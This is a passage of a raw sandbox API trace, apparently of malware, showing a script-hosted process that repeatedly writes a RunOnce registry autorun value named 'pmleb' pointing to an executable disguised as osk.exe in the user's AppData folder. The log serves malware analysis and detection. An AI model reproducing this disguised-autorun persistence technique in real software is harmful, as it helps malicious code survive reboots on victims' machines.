lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.445] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.445] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.445] RegCloseKey (hKey=0x280) returned 0x0 [0078.445] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.445] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.445] SetTimer (hWnd=0x20280, nIDEvent=0x2022, uElapse=0xa, lpTimerFunc=0x0) returned 0x2022 [0078.445] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.458] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.458] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.458] KillTimer (hWnd=0x20280, uIDEvent=0x2022) returned 1 [0078.458] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.458] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.459] IUnknown:Release (This=0x787518) returned 0x1 [0078.459] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.459] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.459] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.459] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.459] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.459] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.459] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.459] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.459] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.459] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x23 [0078.459] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.459] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x24 [0078.460] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.460] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x23 [0078.460] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.460] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.460] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.460] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.460] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.460] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.461] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.461] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.461] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.461] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.461] RegCloseKey (hKey=0x280) returned 0x0 [0078.461] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.461] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.461] SetTimer (hWnd=0x20280, nIDEvent=0x2023, uElapse=0xa, lpTimerFunc=0x0) returned 0x2023 [0078.461] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.473] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.474] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.474] KillTimer (hWnd=0x20280, uIDEvent=0x2023) returned 1 [0078.474] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.474] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.474] IUnknown:Release (This=0x787518) returned 0x1 [0078.474] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.474] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.474] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.475] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.475] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.475] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.475] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.475] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.475] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.475] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x24 [0078.475] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.475] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x25 [0078.475] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.476] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x24 [0078.476] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.476] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.476] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.476] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.476] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.476] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.476] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.476] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.476] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.476] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.477] RegCloseKey (hKey=0x280) returned 0x0 [0078.477] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.477] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.477] SetTimer (hWnd=0x20280, nIDEvent=0x2024, uElapse=0xa, lpTimerFunc=0x0) returned 0x2024 [0078.477] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.494] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.494] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.494] KillTimer (hWnd=0x20280, uIDEvent=0x2024) returned 1 [0078.494] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.494] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.494] IUnknown:Release (This=0x787518) returned 0x1 [0078.495] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.495] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.495] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.495] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.495] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.495] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.495] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.495] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.495] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.495] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x25 [0078.495] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.496] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x26 [0078.496] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.497] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x25 [0078.497] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.497] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.497] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.497] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.497] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.497] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 